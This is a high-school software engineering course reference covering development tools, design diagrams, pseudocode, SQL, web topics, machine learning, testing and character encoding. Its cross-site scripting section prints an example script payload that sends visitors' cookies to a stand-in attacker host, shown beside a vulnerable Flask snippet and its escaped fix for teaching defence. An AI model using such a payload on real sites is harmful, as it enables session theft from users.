Course Tools & Specifications | HSC Software Engineering

Part 1 💻 Development Environment

💻 IDE & Development Tools

An Integrated Development Environment (IDE) combines a code editor, build tools, debugger, and other features into a single application. A plain text editor (e.g. Notepad, nano) only edits text — you must run all other tools separately.

⚖️ IDE vs Text Editor — Feature Comparison

Feature	Text Editor	IDE
Syntax highlighting	Basic / plugin	Built-in, language-aware
IntelliSense / autocomplete	Rarely	Yes — context-aware suggestions
Integrated debugger	No	Yes — breakpoints, watch variables
Refactoring tools	No	Yes — rename, extract, inline
Extensions / plugins	Limited	Large ecosystem
Integrated terminal	Rarely	Yes — run commands without leaving the editor
Version control integration	No	Yes — diff, commit, branch from sidebar
Linter / static analysis	Plugin only	Built-in or first-class plugin

🟦 VS Code — Setup for Python

Visual Studio Code is a lightweight, free IDE by Microsoft with a vast extension library. Recommended extensions for Python HSC work:

Python (ms-python)Provides IntelliSense, linting, debugging, and environment selection for Python files.

PylanceFast, feature-rich language server that powers type checking and smart autocomplete beyond the base Python extension.

GitLensEnhances the built-in Git support — shows inline blame annotations, commit history, and file comparison.

JSON — .vscode/settings.json basics

{
  "editor.fontSize": 14,
  "editor.tabSize": 4,
  "editor.formatOnSave": true,
  "python.defaultInterpreterPath": "${workspaceFolder}/venv/bin/python",
  "python.linting.enabled": true,
  "python.linting.pylintEnabled": true,
  "editor.rulers": [79],
  "files.trimTrailingWhitespace": true
}

🐉 PyCharm — Setup for Python

PyCharm (JetBrains) is a full Python IDE with deeper analysis than VS Code. Key setup steps:

Project InterpreterSet via File → Settings → Project → Python Interpreter. Create or select a virtual environment (venv) specific to your project so packages do not conflict.

Run ConfigurationsDefined in Run → Edit Configurations. Set the script path, working directory, and any environment variables. Allows one-click running or debugging of any file.

🔌 Arduino IDE

Used for programming Arduino microcontrollers (C/C++ dialect). Key features for HSC Mechatronics:

Board ManagerInstall support packages for different boards — accessed via Tools → Board → Board Manager. Required when using non-standard boards (e.g. ESP32, Arduino Nano).

Library ManagerInstall third-party sensor and component libraries via Sketch → Include Library → Manage Libraries. Examples: Servo, DHT sensor library.

Serial MonitorOpens a terminal showing data sent over the USB serial port via Serial.println(). Essential for debugging sensor readings and program state at runtime.

🐍 Thonny — MicroPython on Microcontrollers

Thonny is a beginner-friendly Python IDE designed for education and MicroPython development on boards like Raspberry Pi Pico and ESP32.

REPL (Read-Eval-Print Loop)An interactive shell at the bottom of Thonny. Type a Python expression and see the result instantly — useful for testing individual lines before adding them to a script.

File TransferThe Files panel shows both your computer's filesystem and the microcontroller's filesystem side by side. Right-click a file and choose Upload to / to copy it to the board, or Download to retrieve it.

📋 IDE Features Summary Table

Feature	VS Code	PyCharm	Arduino IDE	Thonny
Autocomplete	Yes (Pylance)	Yes (built-in)	Limited	Basic
Syntax highlighting	Yes	Yes	Yes	Yes
Integrated debugger	Yes	Yes	No	Yes (MicroPython)
Version control integration	Yes (Git)	Yes (Git)	No	No
Linter / static analysis	Yes (Pylint/Flake8)	Yes (built-in)	No	Limited
Refactoring	Basic	Advanced	No	No

Which IDE for which HSC task?

Use VS Code for general Python development, web programming tasks, and any project where you want Git integration without a heavyweight install.
Use PyCharm for larger Python projects that benefit from advanced refactoring, deeper type checking, and database tools (Community Edition is free).
Use Arduino IDE for all Arduino-based mechatronics tasks — it handles board-specific compilation and serial communication.
Use Thonny for MicroPython on Raspberry Pi Pico or ESP32 — its built-in file transfer and REPL make deploying to the board fast and simple.

Part 2 🗺️ Design & Modelling

🗺️ System and Data Modelling Tools

📊 Data Flow Diagrams (DFD)

Used to represent the flow of data through an information system. DFDs show what data moves through a system and where it goes — not how or when.

⭕ CircleProcess — transforms input data into output (e.g. "Validate Login").

🗃️ Open RectangleData Store — persistent storage such as a file or database table (e.g. "D1 Users").

🏢 RectangleExternal Entity — a person or system outside the boundary that sends or receives data (e.g. "Customer").

↩️ ArrowData Flow — named arrow showing data moving between elements (e.g. "username + password").

NESA Specification: Data Stores
While industry diagrams often use a cylinder for databases, NESA strictly requires Data Stores to be drawn as an open rectangle (two parallel horizontal lines) in HSC exams. Ensure you use this specific notation when drawing DFDs.

Level 0 (Context Diagram): Shows the entire system as a single process bubble with all external entities. No data stores or sub-processes are shown.

Level 1 DFD: Expands the single bubble into its major processes. Data stores appear at this level. Each process can be further expanded into a Level 2 DFD if needed.

Example scenario — Online Bookshop: A Customer (external entity) sends an order request (data flow) to the Process Order (process), which reads from the D1 Book Catalogue (data store) and sends a confirmation back to the customer.

🏗️ Structure Charts

Represent a system's modular design — showing how subroutines are called from one another in a hierarchy. Modules at the top control modules below them.

▭ RectangleModule — a named subroutine or function (e.g. "Calculate Total").

🔘 Empty Circle ArrowData parameter — a data value passed between modules (e.g. passing a score).

⚫ Filled Circle ArrowControl flag — a status variable passed between modules (e.g. a Boolean "isValid").

🔷 DiamondSelection — indicates a module is called conditionally.

🔁 Curved ArrowRepetition — indicates a module is called inside a loop.

Example: A top-level Main module calls GetInput, ProcessData, and DisplayResult. An arrow from GetInput back to Main carries the data parameter userScore.

Structure Chart — Online Bookshop (text notation)

MainModule
├── GetOrder          [🔘 orderDetails passed UP to MainModule]
│     ├── ValidateISBN      [⚫ isValid flag returned]
│     └── CheckStock        [⚫ stockAvailable flag returned]
├── ProcessPayment    [🔘 amount, 🔁 retry loop if payment fails]
│     ├── ChargeCard        [⚫ paymentSuccess flag returned]
│     └── SendReceipt       [🔘 email, orderID]
└── UpdateInventory   [🔘 ISBN, quantitySold]

Legend: 🔘 data parameter  ⚫ control flag  🔁 loop  ◇ conditional call

📋 Data Dictionary

A structured reference that documents every variable and data element in a system. Each entry includes: Name, Data Type, Format, Size, Description, Example value, and Validation rules.

Name	Data Type	Format	Size	Description	Example	Validation
`studentID`	Integer	XXXXXX	6 digits	Unique student identifier	482019	Must be 6 digits, not null
`surname`	String	Text	50 chars	Student's family name	Smith	Letters only, not empty
`score`	Real	##.#	4 bytes	Exam score out of 100	87.5	0.0 ≤ score ≤ 100.0
`dateOfBirth`	Date	DD/MM/YYYY	10 chars	Student's date of birth	14/03/2007	Valid calendar date

🧩 Class Diagrams

Used in object-oriented design to show classes, their attributes, methods, and the relationships between them. Each class is drawn as a box divided into three compartments.

Class Diagram — Example

┌─────────────────────┐
│       Student       │  ← Class name
├─────────────────────┤
│ - studentID: int    │  ← Attributes (- private, + public)
│ - name: String      │
│ - score: float      │
├─────────────────────┤
│ + getScore(): float │  ← Methods
│ + setScore(s: float)│
│ + isPassing(): bool │
└─────────────────────┘

     Student ──────▷ Person      (Inheritance: Student extends Person)
     Course  ◆───── Lesson       (Composition: Course owns its Lessons)
     Student ──────  Course      (Association: Student enrols in Course)

— (solid line)Association — a general relationship between two classes.

▷ (open arrow)Inheritance — a subclass extends a superclass (is-a relationship).

◇ (open diamond)Aggregation — a "has-a" relationship; parts can exist independently.

◆ (filled diamond)Composition — parts cannot exist without the whole (strong ownership).

🖼️ Storyboard

A visual sequence of annotated screen layouts showing the user's journey through a system. Created in the design phase before any code is written, storyboards allow stakeholders to review and approve the interface before development begins.

Each frame in a storyboard typically includes:

A sketch or wireframe of the screen layout
The screen name or state (e.g. "Login Screen", "Results Page")
Navigation arrows showing what triggers the transition to the next screen (e.g. "Click Submit")
Notes on input fields, buttons, and displayed data

Design phase: Storyboards are created before any code is written — during the Design phase of the SDLC. They allow clients to approve the interface and user flow before development begins, which avoids costly rework. For the HSC project, a storyboard typically shows 4–8 frames: a home/login screen, a main feature screen, an input form, and a results/output screen.

🌳 Decision Trees

A tree-based diagram that models decision logic. Starting from a root condition, each branch represents a possible outcome of a test. Decision trees are useful for representing complex nested logic clearly.

Decision Tree — Exam Grade Example

Is score ≥ 90?
├── YES → Grade: A
└── NO
    Is score ≥ 75?
    ├── YES → Grade: B
    └── NO
        Is score ≥ 50?
        ├── YES → Grade: C
        └── NO → Grade: Fail

📋 Project Management Tools

📈 Gantt Charts

A horizontal bar chart that displays all project tasks against a timeline, making it easy to see what needs to happen, in what order, and how long each task should take.

Task	Week 1	Week 2	Week 3	Week 4	Depends on
Requirements analysis	████				—
Design (DFD, structure chart)	░░	████			Requirements
Coding		░░	████	░░	Design
Testing			░░	████	Coding

Task barsHorizontal bars showing the planned start, duration, and end of each task.

DependenciesArrows or indentation indicating which tasks must finish before another can begin.

MilestonesKey checkpoints (often shown as a diamond ◆) marking a significant completion point.

Critical pathThe sequence of dependent tasks that determines the minimum project duration.

📝 Process Diaries / Log Books

A regular written record kept throughout the project. Entries are made at consistent intervals (e.g. after each work session, weekly, or at each milestone) and serve as evidence of the development process.

A typical log entry includes:

Date and time of the session
Tasks completed — what was achieved
Obstacles encountered — bugs, design problems, or blockers
Next steps — what will be attempted in the next session
Reflective comments — what was learned or what could be improved

Process Diary — Example Entry

Date: 14 March 2025    Session duration: 90 minutes

Tasks completed:
  - Implemented the login form with input validation (Python / Flask)
  - Updated Gantt chart: testing phase pushed back 2 days

Stumbling blocks:
  - The input sanitisation function was stripping "+" characters from
    valid email addresses (e.g. user+tag@example.com)

Solutions applied:
  - Updated the regex to r'^[\w.+\-]+@[\w\-]+\.[\w.]+$'
  - Verified against RFC 5321 which confirms "+" is legal in the local part

Next steps:
  - Write unit tests for the validate_email() function
  - Begin designing the database schema

Reflective comment:
  - This bug took longer than expected. In future I should test
    edge cases during coding rather than discovering them in testing.

In the HSC Software Engineering Project, your process diary is submitted as evidence of your development approach and is assessed alongside your final solution.

Part 3 ⌨️ Core Programming

⌨️ Programming Paradigms

A programming paradigm is a fundamental style or approach to solving problems with code. Different paradigms suit different types of problems.

🧩 Object-Oriented

Organises code into classes and objects. Key concepts: attributes, methods, inheritance, polymorphism, and encapsulation. Used in Python, Java, C#.

class Dog:
    def __init__(self, name):
        self.name = name
    def bark(self):
        return "Woof!"

📝 Logic

Programs are expressed as facts and rules; the engine finds solutions automatically. Used in Prolog for AI and expert systems.

% Prolog-style logic
parent(tom, bob).
parent(bob, ann).
grandparent(X, Z) :-
    parent(X, Y), parent(Y, Z).

🖥️ Imperative

Programs describe how to do something as a sequence of commands — control structures, assignment, expressions, and subroutines. Most common paradigm; used in Python, C, Pascal.

total = 0
for i in range(1, 6):
    total = total + i
print(total)  # 15

⚙️ Functional

Treats computation as evaluating functions. Avoids changing state; uses recursion and first-class functions. Used in Haskell, Erlang; supported in Python.

# Python functional style
nums = [1, 2, 3, 4, 5]
total = sum(map(lambda x: x*2, nums))
print(total)  # 30

📝 Algorithms

An algorithm is a precise, step-by-step set of instructions for solving a problem. In HSC Software Engineering, algorithms are communicated using pseudocode or flowcharts.

💻 Pseudocode

A structured English-like notation for expressing algorithms. It is not executable code — it communicates logic without worrying about syntax. NSW HSC conventions:

Keywords in CAPITALS (e.g. IF, WHILE, FOR)
Structural keywords come in matched pairs: IF / ENDIF, WHILE / ENDWHILE, BEGIN / END
Indent the body of every control structure
Use ← for assignment (e.g. total ← 0)

Pseudocode — Find the largest number in a list

BEGIN
  INPUT numbers        # A list of numbers entered by the user
  largest ← numbers[0]
  FOR i = 1 TO LENGTH(numbers) - 1
    IF numbers[i] > largest THEN
      largest ← numbers[i]
    ENDIF
  NEXT i
  OUTPUT "Largest value: ", largest
END

🌊 Flowcharts

A visual diagram using standardised shapes connected by arrows to show the flow of logic through an algorithm.

🔵 OvalTerminator — marks the Start or End of the algorithm.

📐 ParallelogramInput/Output — data entering (INPUT) or leaving (OUTPUT/DISPLAY) the system.

▭ RectangleProcess — a computation, assignment, or action (e.g. total ← total + score).

🔶 DiamondDecision — a yes/no or true/false branch (e.g. score ≥ 50?).

🗂️ Double-sided RectangleSubprogram — a call to a named subroutine or function.

Flowchart — Find the largest number in a list (text diagram)

        ╔══════════╗
        ║  START   ║   ← Oval terminator
        ╚════╤═════╝
             │
     ╔═══════╧════════╗
     ║  largest ← 0   ║   ← Process rectangle
     ║  i ← 1         ║
     ╚═══════╤════════╝
             │
     ╔═══════╧════════╗
     ║  INPUT number  ║   ← Parallelogram (input)
     ╚═══════╤════════╝
             │
        ╔════╧═════╗
        ║ number > ║   ← Diamond (decision)
        ║ largest? ║
        ╚═╤══════╤═╝
       YES│      │NO
          ▼      │
  ╔═══════════╗  │
  ║ largest ← ║  │   ← Process
  ║  number   ║  │
  ╚═════╤═════╝  │
        └────────┘
             │
        ╔════╧═════╗
        ║  i < n?  ║   ← Loop back if more numbers remain
        ╚═╤══════╤═╝
       YES│      │NO
          │      ▼
          │  ╔══════════════╗
          │  ║ OUTPUT       ║   ← Parallelogram (output)
          │  ║ largest      ║
          │  ╚══════╤═══════╝
          │         │
          │    ╔════╧═════╗
          │    ║   END    ║   ← Oval terminator
          │    ╚══════════╝
          │
     (loop back to INPUT)

Pseudocode vs Flowcharts: Both express the same algorithm. Pseudocode is preferred for complex logic and is easier to convert to code. Flowcharts are better for visualising branching and communicating with non-programmers.

🕹️ Control Structures

Control structures determine the order in which instructions execute. Every algorithm is built from three fundamental building blocks: Sequence, Selection, and Repetition.

➡️ Sequence

The default mode — statements execute one after another, top to bottom, in the exact order they are written. No branching or repetition occurs.

Pseudocode — Calculate a student's average

BEGIN
  INPUT score1
  INPUT score2
  INPUT score3
  total ← score1 + score2 + score3
  average ← total / 3
  OUTPUT "Average score: ", average
END

🔀 Selection

Allows the program to choose between different paths based on a condition.

2️⃣ Binary Selection

Chooses between exactly two outcomes: one path if the condition is true, another if it is false.

Pseudocode — Pass or fail

IF score >= 50 THEN
  OUTPUT "Result: Pass"
ELSE
  OUTPUT "Result: Fail"
ENDIF

🔢 Multi-way Selection

Selects from several possible outcomes based on a single expression's value. More readable than a chain of IF/ELSE IF.

Pseudocode — Menu selection

CASEWHERE menuChoice equals
  1: OUTPUT "New Game"
  2: OUTPUT "Load Game"
  3: OUTPUT "High Scores"
  OTHERWISE: OUTPUT "Invalid choice"
END CASE

🪆 Nested IF

An IF structure placed inside another IF. Used when a decision depends on the result of a previous decision.

Pseudocode — Grade with age check

IF score >= 50 THEN
  IF score >= 85 THEN
    OUTPUT "Grade: A (Distinction)"
  ELSE
    OUTPUT "Grade: Pass"
  ENDIF
ELSE
  OUTPUT "Grade: Fail — please see your teacher"
ENDIF

🔁 Repetition

Allows a block of statements to execute multiple times. The choice of loop depends on whether the number of iterations is known in advance.

⬆️ Pre-test (WHILE)

Checks the condition before each iteration. If the condition is false from the start, the body never executes.

Pseudocode — Validate user input

INPUT password
WHILE password != "correct123"
  OUTPUT "Incorrect password. Try again."
  INPUT password
ENDWHILE
OUTPUT "Access granted."

⬇️ Post-test (REPEAT / UNTIL)

Checks the condition after each iteration. The body always executes at least once.

Pseudocode — Keep asking until valid input

REPEAT
  OUTPUT "Enter a number between 1 and 10: "
  INPUT number
UNTIL number >= 1 AND number <= 10
OUTPUT "You entered: ", number

🔢 FOR / NEXT (Counted Loop)

Used when the number of iterations is known in advance. The loop variable is automatically incremented each cycle.

Pseudocode — Sum five scores

total ← 0
FOR i = 1 TO 5 STEP 1
  INPUT score
  total ← total + score
NEXT i
average ← total / 5
OUTPUT "Class average: ", average

Choosing the right loop: Use FOR/NEXT when the count is known. Use WHILE when checking a condition before starting. Use REPEAT/UNTIL when the body must run at least once (e.g. input validation).

🔧 Subroutines

A subroutine is a named, reusable block of code that performs a specific task. Subroutines promote modularity — breaking a large problem into smaller, manageable pieces.

Procedure vs Function: A procedure (subroutine) performs an action but does not return a value. A function performs a calculation and returns a result to the caller.

🔧 Using a Subroutine with One Parameter

A parameter is a variable that receives a value when the subroutine is called. The value passed in is called an argument.

Pseudocode — Display a greeting

SUBROUTINE greetStudent(studentName)
  OUTPUT "Welcome, ", studentName, "!"
  OUTPUT "Good luck with your HSC."
END SUBROUTINE

# Calling the subroutine:
greetStudent("Alice")
greetStudent("Ben")

⚙️ Using a Subroutine with Multiple Parameters

Multiple parameters are separated by commas. Each argument passed must match the corresponding parameter in position and type.

Pseudocode — Print a student result

SUBROUTINE displayResult(studentName, score)
  OUTPUT studentName, " scored ", score, "/100"
  IF score >= 50 THEN
    OUTPUT "Result: Pass"
  ELSE
    OUTPUT "Result: Fail"
  ENDIF
END SUBROUTINE

# Calling the subroutine:
displayResult("Alice", 87)
displayResult("Ben", 43)

↩️ Passing a Value Back from a Function

A function uses RETURN to send a computed value back to the line that called it. The returned value can be stored in a variable or used directly in an expression.

Pseudocode — Calculate letter grade

FUNCTION getGrade(score)
  IF score >= 90 THEN
    RETURN "A"
  ELSE IF score >= 75 THEN
    RETURN "B"
  ELSE IF score >= 50 THEN
    RETURN "C"
  ELSE
    RETURN "Fail"
  ENDIF
END FUNCTION

# Calling the function:
grade ← getGrade(82)
OUTPUT "Your grade is: ", grade    # Your grade is: B

Part 4 🗄️ Data, Systems & Specialist Topics

🗄️ Relational Databases

🗄️ SQL

Structured Query Language (SQL) is the standard language for interacting with relational databases. A relational database stores data in tables (relations), where each row is a record and each column is a field.

SQL — Standard Syntax

SELECT field(s)
FROM table(s)
WHERE search criteria
GROUP BY field(s)
ORDER BY field(s) ASC/DESC

SQL — Worked Examples

-- Get all students with a score above 80, sorted highest first
SELECT studentID, surname, score
FROM Students
WHERE score > 80
ORDER BY score DESC;

-- Count how many students passed each subject
SELECT subjectName, COUNT(*) AS numPassing
FROM Enrolments
WHERE score >= 50
GROUP BY subjectName
ORDER BY numPassing DESC;

-- Join two tables: get student names with their subject enrolments
SELECT Students.surname, Subjects.subjectName, Enrolments.score
FROM Students
JOIN Enrolments ON Students.studentID = Enrolments.studentID
JOIN Subjects ON Enrolments.subjectID = Subjects.subjectID
WHERE Enrolments.score >= 50;

SUM / AVG / COUNT / MAX / MINAggregate functions that operate on a set of rows (e.g. AVG(score)).

AND / OR / NOTLogical operators to combine conditions in a WHERE clause.

JOINCombines rows from two or more tables based on a matching key field.

PRIMARY KEYA field (or combination) that uniquely identifies each row in a table.

FOREIGN KEYA field in one table that references the primary key of another, creating a relationship.

🔗 Object-Relational Mapping (ORM)

ORM is a programming technique that allows a developer to interact with a relational database using objects rather than raw SQL. The ORM framework automatically generates the SQL behind the scenes.

Class → TableEach class in the object model corresponds to a database table.

Attribute → ColumnEach attribute of the class becomes a column in the table.

Object → RowEach instance of the class is stored as a row (record) in the table.

Python — ORM-style example (SQLAlchemy)

# The class maps directly to the "students" database table
class Student(Base):
    __tablename__ = 'students'
    studentID = Column(Integer, primary_key=True)
    surname   = Column(String(50))
    score     = Column(Float)

# Query using objects instead of SQL strings
passing = session.query(Student).filter(Student.score >= 50).all()
for s in passing:
    print(s.surname, s.score)

🦾 Wiring Diagrams for Mechatronic Systems

Wiring diagrams use standardised schematic symbols to represent electronic components and their connections. They show how components are electrically connected in a circuit — different from a physical layout diagram.

⚡ Resistor

Limits current flow. Shown as a rectangle or zigzag line. Value measured in Ohms (Ω).

🔋 Capacitor

Stores electrical charge temporarily. Shown as two parallel lines. Value in Farads (F).

➡️ Diode / LED

Allows current to flow in one direction only. LED emits light when conducting. Shown as a triangle pointing to a line.

🔌 Voltage Source

Provides electrical potential. DC shown as long/short parallel lines; AC shown as a circle with a wave symbol.

🔊 Speaker / Motor

Output transducers — convert electrical energy to sound (speaker) or mechanical motion (motor).

🧩 Integrated Circuit (IC)

A chip containing many transistors and logic gates. Shown as a rectangle with labelled input/output pins.

Tracing a circuit — LED with current-limiting resistor:

+5V → [Resistor 220Ω] → [LED Anode (+)] → [LED Cathode (−)] → GND

In wiring diagrams, always trace from the positive supply (VCC/5V) through each component in series to ground (GND). The resistor limits current so the LED doesn't burn out (LEDs typically need 20mA at 2V forward voltage; at 5V supply: R = (5 − 2) / 0.02 = 150Ω minimum — 220Ω is the standard safe choice).

In Arduino projects: digital output pin → resistor → LED → GND. When the pin outputs HIGH (5V), current flows and the LED illuminates.

🌐 Programming for the Web

🖼️ Front-end Web Development Frameworks

Front-end frameworks provide pre-built, reusable components and a structured approach to building user interfaces in the browser. Rather than writing all HTML/CSS/JS from scratch, developers compose interfaces from components.

ReactA JavaScript library by Meta for building component-based UIs. Uses a virtual DOM for efficient updates.

VueA progressive framework that is lightweight and easy to integrate into existing projects.

AngularA full framework by Google that includes routing, state management, and dependency injection built in.

Framework vs Library: A library (like React) is called by your code when you need it. A framework (like Angular) calls your code — it provides the overall structure and you fill in the details.

🛡️ Cross-site Scripting (XSS)

XSS is a web security vulnerability where an attacker injects malicious client-side scripts into web pages that other users then view. The injected script runs in the victim's browser with the same trust level as the legitimate site.

Attack scenario: A forum site displays user comments without sanitising them. An attacker posts a comment containing a <script> tag. Every visitor who loads the page runs the script in their own browser — the attacker can steal session cookies, redirect users, or log keystrokes.

XSS — Vulnerable vs Safe output (Python Flask)

# VULNERABLE — user input rendered directly as HTML:
comment = request.form['comment']
return f"<p>{comment}</p>"
# If comment = <script>document.location='https://evil.com?c='+document.cookie</script>
# → every visitor's cookie is sent to the attacker

# SAFE — escape special characters before rendering:
from markupsafe import escape
safe_comment = escape(comment)
return f"<p>{safe_comment}</p>"
# <script> becomes &lt;script&gt; — displayed as text, never executed

Mitigation checklist: (1) Escape output — convert < > & " ' to HTML entities before rendering any user-supplied content.
(2) Validate input server-side — reject input that doesn't match an expected format or whitelist.
(3) Content Security Policy (CSP) — set a response header restricting which scripts may execute on your page.

Escaping outputConvert special characters (< > & " ') to HTML entities so they render as text rather than being parsed as markup.

Input validationReject or sanitise input that doesn't match expected formats on the server side (never rely on client-side validation alone).

Content Security PolicyAn HTTP response header that tells the browser which sources of script are trusted — blocking injected inline scripts even if they reach the page.

🎨 Cascading Style Sheets (CSS)

CSS describes the visual presentation of HTML documents — colours, layout, fonts, and spacing. Styles cascade: more specific rules override more general ones.

CSS — Syntax and Examples

/* Syntax: selector { property: value; } */

/* Element selector — targets all <p> tags */
p {
  font-size: 16px;
  color: #333333;
  line-height: 1.6;
}

/* Class selector — targets elements with class="highlight" */
.highlight {
  background-color: yellow;
  font-weight: bold;
}

/* ID selector — targets the unique element with id="header" */
#header {
  background-color: #2c3e50;
  padding: 20px;
  text-align: center;
}

/* Descendant selector — targets <a> inside .nav */
.nav a {
  color: white;
  text-decoration: none;
}

SelectorTargets which element(s) to style: element (p), class (.name), ID (#name), or descendant (div p).

PropertyThe visual attribute to change: color, font-size, margin, padding, display.

ValueThe setting for that property: red, 16px, 1em, auto, #ff0000.

SpecificityMore specific selectors win: ID > class > element. Inline styles override all.

🤖 Machine Learning

Machine learning (ML) enables systems to learn patterns from data and make predictions or decisions without being explicitly programmed for each case.

♾️ Machine Learning Automation through MLOps

MLOps integrates ML workflows with software engineering and DevOps practices to make model development and deployment reliable and repeatable. Three stages:

1. DesignDefine the problem, choose success metrics, and research available data sources. Determine whether ML is the right solution.

2. Model DevelopmentCollect and clean data (wrangling), select features (feature engineering), train the model, then validate and tune it.

3. OperationsDeploy the trained model to production, monitor its real-world performance, and retrain when the model degrades over time.

📉 Regression Algorithms

Supervised learning algorithms that predict a continuous numerical output from input features. The algorithm learns the mapping between inputs and outputs from labelled training data.

Linear RegressionFits a straight line to the data: y = mx + b. Example: predicting a student's final exam score from hours studied.

Multiple Linear RegressionExtends to multiple input features: y = m₁x₁ + m₂x₂ + … + b. Example: predicting house price from size, location, and age.

Logistic RegressionDespite the name, used for classification — outputs a probability between 0 and 1. Example: spam or not spam.

Polynomial RegressionFits a curved line by adding powers of features (x², x³, …). Used when data has a non-linear relationship.

🕸️ Neural Networks

Computational models loosely inspired by the brain, composed of layers of interconnected nodes (neurons). Each connection has a weight that is adjusted during training.

Neural Network Architecture showing hidden layers and weights

graph LR %% Input Layer I1((x₁)):::inputLayer I2((x₂)):::inputLayer I3((x₃)):::inputLayer %% Hidden Layer 1 H1_1((h₁)):::hiddenLayer H1_2((h₂)):::hiddenLayer H1_3((h₃)):::hiddenLayer %% Output Layer O1((Spam)):::outputLayer O2((Not Spam)):::outputLayer %% Connections with varying weights I1 --> H1_1 I1 --> H1_2 I1 --> H1_3 I2 --> H1_1 I2 --> H1_2 I2 --> H1_3 I3 --> H1_1 I3 --> H1_2 I3 --> H1_3 H1_1 --> O1 H1_1 --> O2 H1_2 --> O1 H1_2 --> O2 H1_3 --> O1 H1_3 --> O2 %% Styling to simulate varying signal strength (weights) linkStyle 0 stroke-width:4px,stroke:#6366f1; linkStyle 1 stroke-width:1px,stroke:#94a3b8; linkStyle 2 stroke-width:2px,stroke:#94a3b8; linkStyle 3 stroke-width:1px,stroke:#94a3b8; linkStyle 4 stroke-width:5px,stroke:#6366f1; linkStyle 5 stroke-width:2px,stroke:#94a3b8; linkStyle 6 stroke-width:2px,stroke:#94a3b8; linkStyle 7 stroke-width:1px,stroke:#94a3b8; linkStyle 8 stroke-width:3px,stroke:#6366f1; classDef inputLayer fill:#dbeafe,stroke:#3b82f6,color:#000; classDef hiddenLayer fill:#f3e8ff,stroke:#a855f7,color:#000; classDef outputLayer fill:#dcfce7,stroke:#22c55e,color:#000;

Notice the variable line thicknesses connecting the nodes — these represent internal weightings, a core NESA requirement to visually demonstrate signal priority in neural architectures.

📥 Input layerReceives the raw input features (e.g. pixel values of an image, or sensor readings). One node per feature.

🧠 Hidden layer(s)One or more intermediate layers that learn to detect patterns automatically. "Deep learning" refers to networks with many hidden layers.

📤 Output layerProduces the final prediction. For binary classification: 1 node. For n classes: n nodes. For regression: 1 node (continuous value).

⚖️ Weights & biasesNumerical parameters on each connection; adjusted during training to minimise prediction error.

⚡ Activation functionIntroduces non-linearity at each neuron (e.g. ReLU, Sigmoid) — without it, deep networks reduce to simple linear regression.

🏋️ Training Cycle

Repeated many times (each complete pass through training data is called an epoch) until the model's error is minimised.

1️⃣ Forward passInput data flows through the network layer by layer to produce a prediction.

2️⃣ Loss calculationA loss function (e.g. mean squared error) measures how far the prediction is from the expected output.

3️⃣ BackpropagationThe loss gradient is computed and propagated backwards through the network to find each weight's contribution to the error.

4️⃣ Weight updateAn optimiser (e.g. gradient descent) nudges weights in the direction that reduces the loss.

🚀 Execution Cycle (Inference)

InferenceThe trained model receives new, unseen input and performs a forward pass to generate a prediction. No weight updates occur.

DeploymentThe model is packaged and integrated into an application or API so end users can benefit from its predictions in real time.

🧪 Methods for Testing a System

Testing verifies that a system behaves correctly and meets its requirements. Different testing methods serve different purposes at different stages of development.

🔧 Functional testingVerifies the system produces the correct output for a given input, according to its functional requirements. Tests specific features in isolation.

✅ Acceptance testingConducted with stakeholders to confirm the system meets agreed requirements. The final check before deployment.

📡 Live data testingTests using real-world production data in a staging environment, revealing issues that only emerge with authentic data patterns.

🎲 Simulated data testingUses artificially generated data to test scenarios that may be rare or impossible to reproduce with live data (e.g. edge cases, extreme values).

🧑‍💻 Beta testingReleases the product to a limited group of real users before full launch to identify usability issues and bugs in realistic conditions.

📦 Volume testingEvaluates system performance under large quantities of data to identify scalability and performance bottlenecks.

📋 Test Data Categories

When designing test cases, you should always include data from three categories:

Category	Test Input	Expected Result	Reason
Valid — normal	`50`	Accepted — "Score recorded"	Middle of valid range
Valid — normal	`85`	Accepted — "Score recorded"	Within range, typical value
Boundary — lower limit	`0`	Accepted — "Score recorded"	Exactly at minimum
Boundary — upper limit	`100`	Accepted — "Score recorded"	Exactly at maximum
Boundary — just below min	`-1`	Rejected — "Score must be 0–100"	One below minimum (off-by-one check)
Boundary — just above max	`101`	Rejected — "Score must be 0–100"	One above maximum (off-by-one check)
Invalid — wrong type	`"abc"`	Rejected — "Must enter a number"	String input where integer expected
Invalid — extreme	`9999`	Rejected — "Score must be 0–100"	Far outside valid range

Exam tip: Always test at the boundary values and one step either side of them. Off-by-one errors (e.g. using > instead of >=) are one of the most common programming bugs and will only be caught by boundary test data.

🔣 Character Representation

Computers store text by mapping each character to a numeric code, which is then stored in binary. The encoding standard used determines which number corresponds to which character.

ASCIIAmerican Standard Code for Information Interchange. A 7-bit encoding representing 128 characters: uppercase letters (A–Z), lowercase (a–z), digits (0–9), punctuation, and control codes.

UnicodeAn international standard that assigns a unique code point to over 140,000 characters, covering most of the world's writing systems including emojis.

UTF-8The most common Unicode encoding on the web. Uses 1–4 bytes per character. Fully backwards-compatible with ASCII (characters 0–127 use the same byte values).

🔢 Character Code Examples

Character	ASCII Decimal	Hexadecimal	Binary (8-bit)
`A`	65	0x41	0100 0001
`B`	66	0x42	0100 0010
`a`	97	0x61	0110 0001
`z`	122	0x7A	0111 1010
`0`	48	0x30	0011 0000
`Space`	32	0x20	0010 0000

Case conversion trick: Notice that 'A' = 65 and 'a' = 97 — a difference of exactly 32 (0b00100000). To convert uppercase to lowercase in binary, you simply set bit 5 to 1. This is why character encoding matters to developers beyond just storing text.

Python — Character encoding examples

# Convert between characters and their ASCII codes
print(ord('A'))        # → 65
print(ord('a'))        # → 97
print(chr(65))         # → 'A'
print(chr(90))         # → 'Z'

# Case conversion using the 32-bit difference
upper = 'H'
lower = chr(ord(upper) + 32)   # 72 + 32 = 104 → 'h'
print(lower)                   # → 'h'

# Simple Caesar cipher — shift each letter by 3
message = "HELLO"
ciphertext = ""
for ch in message:
    shifted = chr(ord(ch) + 3)
    ciphertext += shifted
print(ciphertext)    # → 'KHOOR'

# Check if a character is uppercase, lowercase, or digit
ch = 'G'
if 65 <= ord(ch) <= 90:
    print(f"{ch} is uppercase")
elif 97 <= ord(ch) <= 122:
    print(f"{ch} is lowercase")
elif 48 <= ord(ch) <= 57:
    print(f"{ch} is a digit")

Python — Bitwise Operations Workshop (XOR Encryption)

# NESA requires understanding 'simple encryption' via binary format.
# XOR (^) is a perfect demonstration: encrypting twice with the same key restores the data.

def simple_xor_encrypt(text, key):
    result = ""
    for char in text:
        # 1. Get binary/decimal format of character
        char_val = ord(char)
        # 2. XOR with the key
        cipher_val = char_val ^ key
        # 3. Convert back to character format
        result += chr(cipher_val)
    return result

plaintext = "HSC"
key = 42 # Arbitrary secret key for XOR

# Encrypt
cipher = simple_xor_encrypt(plaintext, key)
